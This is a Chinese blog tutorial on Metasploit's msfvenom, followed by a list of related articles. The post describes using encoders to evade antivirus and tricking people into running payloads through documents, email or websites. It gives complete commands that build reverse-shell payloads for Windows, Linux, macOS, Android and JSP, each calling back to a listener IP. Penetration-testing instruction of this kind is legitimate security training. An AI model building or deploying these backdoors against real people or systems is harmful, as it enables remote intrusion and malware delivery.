Metasploit Framework —— Msfvenom

最新推荐文章于 2024-08-10 06:01:36 发布
最新推荐文章于 2024-08-10 06:01:36 发布
阅读量416 收藏 3
点赞数 2
分类专栏: Metasploit Framework
kaka
本文链接:https://blog.csdn.net/szlg510027010/article/details/107232495
版权

身份证

msfvenom 是 msfpayload 爸爸和 msfencode 妈妈生的仔仔,是两个的结合体,继承了两者的优良品德,生日是 2015 年 6 月 8 日,刚过不久…

用武之地

免杀 : msfvenom 结合 excellent 编码器等生成的 payload 具有一定的免杀效果
客户端渗透 : 在无法突破网络边界的情况下(IDS等)转而进行客户端的渗透,此法常见于社会工程学攻击,进而渗透到线上的业务网络,具体较常见的形式有:图片 邮件 PDF DOC WEB站点…诱骗人家下载执行 payload

msfvenom help
227f02d542c08b9131f06e926873a51.png

查看所有 payload :msfvenom --list payloads
查看所有 encoders :msfvenom --list encoders
[注:其中有两个 rank 为 excellent的:cmd/powershell_base64x86/shikata_ga_nai 常用于免杀中]
…同理可查其它模块

各个平台制造

首先简单说明一下这些参数:

-p:payload
-a:适合架构
–platform:适合平台
-b: 去掉坏字符
-e:编码器
-i:加密次数
-f:生成格式
-o:输出到

是不是感觉很熟悉?没错,跟 payload 那一小节还是蛮像的

Windows

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.67.221 LPORT=8686 -a x86 --platform Windows -e x86/shikata_ga_nai -b "\x00" -f exe -o /root/0windows.exe

Linux

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.67.221 LPORT=8686 -a x86 --platform Linux -f elf -o /root/0linux.elf

Mac

msfvenom -p osx/x86/shell_reverse_tcp LHOST=192.168.67.211 LPORT=8686 -a x86 --platform osx -f macho -o /root/0mac.macho

Android

msfvenom -p android/meterpreter/reverse_tcp -a dalvik LHOST=192.168.67.221 LPORT=8686 -f raw -o /root/0android.apk

除此之外还可以生成各种脚本语言的反弹 shell:
比如 jsp:
msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.67.221 LPORT=8686 -f raw -o /root/0java.jsp

😄

CrAcKeR-1
关注
专栏目录
metasploit下载教程linux,Ubuntu 18.04安装Metasploit Framework指南
weixin_32199821的博客
05-10 1406
本指南介绍了在Ubuntun Linux 18.04LTS上安装Metasploit Framework OSS项目我建议您首先尝试使用以下安装脚本,因为它将比指南中包含的内容更多,如果您执行此操作 不希望运行开源版本或设置开发环境,并且不介意将您的电子邮件地址提供给Rapid 7用于营销。使用安装脚本安装从GitHub下载脚本并使其可执行。 使用-h选项进行测试以确保其正常工作Ubuntu 1...
Kali linux 学习笔记(九十六)metasploit framework——客户端渗透 2020.4.28
闵行小鱼塘
04-28 870
本节学习客户端渗透
E025-渗透测试常用工具-使用msfvenom生成木马进行渗透测试.pdf
12-02
E025-渗透测试常用工具-使用msfvenom生成木马进行渗透测试
metasploit---msfvenom
孤的博客
11-21 1531
在kali2.0的环境上,因为msfpayload没有了,被整合进了msfvenommsfvenom是msfpayload,msfencode的结合体,可利用msfvenom生成木马程序,并在目标机上执行,在本地监听上线。 1. –p (- -payload-options) 添加载荷payload。 载荷这个东西比较多,这个软件就是根据对应的载荷payload生成对应平台下的后门,所以...
Metasploit Framework (MSF) 详解
最新发布
cxm4545的博客
08-10 1613
Metasploit Framework (简称MSF)是一款开源的渗透测试框架,它提供了数百个已知软件漏洞的专业级漏洞攻击工具和漏洞利用模块,为渗透测试,shellcode 编写和漏洞研究提供了一个可靠平台。Kali里自带了MSF工具,使用命令 msfconsole 或者 双击MSF图标 即可以启动MSF。本篇就以Kali为实验环境来学习MSF。
metasploit渗透测试(一)在 Mac 安装 Metasploit-framework
章鱼烧的博客
10-28 5324
Mac 安装 metasploit 渗透测试工具
msfvenom 简介
weixin_34138377的博客
10-23 1534
信很多人升级最新的msf后找不到自己曾经熟悉的msfpayload了(所以说喜欢收集shellcode是一件好事),没错我特么的也找不到了。其实可以use到自己要使用的payload,然后制作。但是也有人喜欢直接在终端里生产自己的shellcode。另外我想也找不到msfencode了,msfencode是shellcode的编码器,准确的来讲如果你自己编写一个shellco...
Kali linux 学习笔记(九十七)metasploit framework——后渗透阶段(一) 2020.4.29
闵行小鱼塘
04-29 862
在获取shell后,需要扩大战果,提权,信息收集,渗透内网,永久后门
渗透测试 ( 3 ) --- Metasploit Framework ( MSF )
墨鱼菜鸡
07-11 4495
白嫖 Metasploit Pro 2022:https://zhuanlan.zhihu.com/p/449836479 白嫖 Metasploit Pro 2022:http://t.zoukankan.com/hxlinux-p-15787814.html 好东西之 metasploit pro:https://www.52pojie.cn/thr...
渗透测试神器——Metasploit Framerwork使用
PICACHU+++的博客
02-19 4117
一、介绍 Metasploit Framework是一个编写、测试和使用exploit代码的完善环境。这个环境为渗透测试,shellcode编写和漏洞研究提供了一个可靠的平台,这个框架主要是由面向对象的Ruby编程语言编写的,并带有由C语言,汇编程序和Python编写的可选组件。 二、基本使用 1.信息收集 db_nmap /nmap -T [0-5]:默认为T3,T4表示最大TCP扫描延迟为10ms -sS:TCP SYN扫描,半开扫描 -sA:TCP ACK扫描 -sT:TCP扫描
metasploit-framework教程(基础篇)
hackerisking的博客
02-24 502
此时将会生成位于home文件夹且名为test.exe的可执行文件(病毒),与metasploit上的multi/handler模块配合,操控靶机电脑。在所有的参数中,最重要的有四个:LHOST和LPORT(监听IP和端口),RHOST和RPORT(靶机IP和端口)这四个参数要设置哪两个,依选择的模块而定。这样,对模块的设置就大功告成了,然后就用exploit/run运行模块。metasploit还有一个好用的拓展功能——msfvenom。在use [模块]后,使用options查看参数。
metasploit Framework 2.7 简要研究报告
04-25 2020
metasploit Framework 2.7  好久没在这里发帖子了,今天把我最近刚研究的成果发布下,大家不要见笑啊!~ 这里要说的是工具是一款非常棒的溢出漏洞利用工具——metasploit 以下是我在鹰盟IDF实验室的一篇简要研究报告,好不好大家用用就知道了!~ metasploit Framework 2.7     metasploit Framework 2.7是一款溢出漏洞利用工具
Msfvenom介绍及利用
热门推荐
小小猪的博客
11-20 2万+
Msfvenom介绍及利用 简介: msfvenom a Metasploit standalone payload generator,Also a replacement for msfpayload and msfencode.是用来生成后门的软件。 MSFvenom是Msfpayload和Msfencode的组合,将这两个工具都放在一个Framework实例中。自2015年6月8日起,msfvenom替换了msfpayload和msfencode。 参数介绍: -l, --list .
msfvenom常用参数
m0_61506558的博客
08-29 1585
列出指定模块的所有可用资源,模块类型包括: payloads, encoders, nops, all。例如:原先有个正常文件normal.exe 可以通过这个选项把后门捆绑到这个程序上面。例如:原先有个正常文件normal.exe 可以通过这个选项把后门捆绑到这个程序上面。设定有效攻击荷载的最大长度生成payload的最大长度,就是文件大小。保护模板程序的动作,注入的payload作为一个新的进程运行。指定需要使用的encoder(编码器)编码免杀。指定需要使用的payload(攻击荷载)。...
Kali Linux渗透测试全程课与脚本语言编程系列课程
09-29
一、课程概要         本课程主要分享分享Kali Linux渗透测试全程课与脚本语言编程系列课程! 二、课程目标          本课程致力于帮助广大学员掌握Kali Linux渗透测试与编程技巧! 三、适合人员         本课程适合兴趣计算机与网络安全技术的学员观看学习! 四、特别提醒         本课程支持一次购买,享受永久观看,欢迎大家选购!
msfvenom 基本使用
blackguest07的博客
03-05 1578
msfvenom 基础命令
msf之msfvenom的使用—使用Kali渗透工具生成远控木马
GUN_C的博客
11-15 3994
msfvenom的使用
Metasploit Framework-安全漏洞检测工具使用
mogexiuluo的博客
04-27 5216
一款开源的安全漏洞检测工具,简称MSF。可以收集信息、探测系统漏洞、执行漏洞利用测试等,为渗透测试、攻击编码和漏洞研究提供了一个可靠平台。集成数千个漏洞利用、辅助测试模块,并保持持续更新。由著名黑客、安全专家H.D. Moore主导开发排行榜排名第二位官方网站:。在kali中,通过msfconsole进入控制台。
Metasploit Framework 3.0中文开发手册
"Metasploit Framework中文手册" Metasploit Framework是一个开源的安全漏洞利用框架,它允许安全研究人员和渗透测试人员开发、测试和利用各种安全漏洞。本手册详细介绍了如何在Metasploit Framework中进行exploit...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值